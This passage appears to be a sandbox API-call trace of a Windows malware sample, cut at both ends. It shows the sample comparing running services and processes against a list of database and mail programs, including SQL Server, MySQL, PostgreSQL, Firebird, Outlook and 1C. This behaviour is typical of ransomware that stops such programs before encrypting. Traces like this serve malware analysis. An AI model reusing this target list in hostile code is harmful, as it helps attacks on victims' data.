(lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0038.337] lstrlenW (lpString="NlaSvc") returned 6 [0038.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0038.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0038.337] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0038.337] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0038.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0038.337] lstrlenW (lpString="nsi") returned 3 [0038.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0038.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0038.337] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0038.337] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0038.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0038.337] lstrlenW (lpString="PcaSvc") returned 6 [0038.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0038.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0038.337] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0038.337] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0038.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0038.337] lstrlenW (lpString="PlugPlay") returned 8 [0038.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0038.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0038.338] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0038.338] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0038.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0038.338] lstrlenW (lpString="Power") returned 5 [0038.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0038.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0038.338] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0038.338] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0038.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0038.338] lstrlenW (lpString="ProfSvc") returned 7 [0038.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0038.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0038.338] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0038.338] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0038.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0038.338] lstrlenW (lpString="RpcEptMapper") returned 12 [0038.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0038.338] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0038.338] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0038.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0038.338] lstrlenW (lpString="RpcSs") returned 5 [0038.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0038.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0038.338] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0038.338] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0038.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0038.338] lstrlenW (lpString="SamSs") returned 5 [0038.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0038.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0038.338] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0038.338] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0038.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0038.338] lstrlenW (lpString="Schedule") returned 8 [0038.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0038.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0038.339] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0038.339] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0038.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0038.339] lstrlenW (lpString="SENS") returned 4 [0038.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0038.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0038.339] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0038.339] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0038.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0038.339] lstrlenW (lpString="ShellHWDetection") returned 16 [0038.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0038.339] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0038.339] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0038.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0038.339] lstrlenW (lpString="Spooler") returned 7 [0038.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0038.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0038.339] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0038.339] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0038.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0038.339] lstrlenW (lpString="SysMain") returned 7 [0038.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0038.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0038.339] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0038.339] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0038.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0038.339] lstrlenW (lpString="Themes") returned 6 [0038.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0038.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0038.339] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0038.339] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0038.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0038.339] lstrlenW (lpString="TrkWks") returned 6 [0038.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0038.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0038.340] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0038.340] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0038.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0038.340] lstrlenW (lpString="UxSms") returned 5 [0038.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0038.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0038.340] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0038.340] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0038.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0038.340] lstrlenW (lpString="VSS") returned 3 [0038.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0038.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0038.340] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0038.340] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0038.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0038.340] lstrlenW (lpString="WdiServiceHost") returned 14 [0038.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0038.340] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0038.340] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0038.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0038.340] lstrlenW (lpString="WdiSystemHost") returned 13 [0038.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0038.340] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0038.340] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0038.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0038.340] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0038.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0038.340] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0038.340] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0038.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0038.340] lstrlenW (lpString="Winmgmt") returned 7 [0038.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0038.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0038.341] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0038.341] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0038.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0038.341] lstrlenW (lpString="WPDBusEnum") returned 10 [0038.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0038.341] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0038.341] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0038.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0038.341] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0038.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c8 [0038.343] Process32FirstW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0038.344] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0038.345] lstrlenW (lpString="System") returned 6 [0038.345] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0038.345] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0038.345] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0038.345] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0038.345] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0038.345] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0038.345] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0038.345] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0038.346] lstrlenW (lpString="smss.exe") returned 8 [0038.346] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0038.346] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0038.346] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0038.346] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0038.346] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0038.346] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0038.346] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0038.346] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.346] lstrlenW (lpString="csrss.exe") returned 9 [0038.347] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.347] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0038.347] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0038.347] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0038.347] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0038.347] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0038.347] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0038.347] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0038.347] lstrlenW (lpString="wininit.exe") returned 11 [0038.347] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0038.347] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0038.347] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0038.347] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0038.347] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0038.347] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0038.348] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0038.348] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0038.348] lstrlenW (lpString="csrss.exe") returned 9 [0038.348] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0038.348] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0038.349] lstrlenW (lpString="winlogon.exe") returned 12 [0038.349] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0038.350] lstrlenW (lpString="services.exe") returned 12 [0038.350] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0038.350] lstrlenW (lpString="lsass.exe") returned 9 [0038.350] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0038.351] lstrlenW (lpString="lsm.exe") returned 7 [0038.351] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.352] lstrlenW (lpString="svchost.exe") returned 11 [0038.352] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.352] lstrlenW (lpString="svchost.exe") returned 11 [0038.352] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.353] lstrlenW (lpString="svchost.exe") returned 11 [0038.353] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.354] lstrlenW (lpString="svchost.exe") returned 11 [0038.354] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.354] lstrlenW (lpString="svchost.exe") returned 11 [0038.354] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0038.355] lstrlenW (lpString="audiodg.exe") returned 11 [0038.355] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.356] lstrlenW (lpString="svchost.exe") returned 11 [0038.356] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.356] lstrlenW (lpString="svchost.exe") returned 11 [0038.356] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0038.357] lstrlenW (lpString="dwm.exe") returned 7 [0038.357] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0038.358] lstrlenW (lpString="explorer.exe") returned 12 [0038.358] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0038.358] lstrlenW (lpString="spoolsv.exe") returned 11 [0038.358] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.359] lstrlenW (lpString="taskhost.exe") returned 12 [0038.359] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0038.360] lstrlenW (lpString="svchost.exe") returned 11 [0038.360] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0038.361] lstrlenW (lpString="taskeng.exe") returned 11 [0038.361] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0038.361] lstrlenW (lpString="taskhost.exe") returned 12 [0038.361] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0038.362] lstrlenW (lpString="carried trinity.exe") returned 19 [0038.362] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0038.363] lstrlenW (lpString="heaven.exe") returned 10 [0038.363] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0038.363] lstrlenW (lpString="dell.exe") returned 8 [0038.363] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0038.364] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0038.364] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0038.365] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0038.365] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0038.365] lstrlenW (lpString="til ear equal.exe") returned 17 [0038.365] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0038.366] lstrlenW (lpString="itunes-bring.exe") returned 16 [0038.366] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0038.367] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0038.367] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0038.367] lstrlenW (lpString="philadelphia.exe") returned 16 [0038.367] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0038.368] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0038.368] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 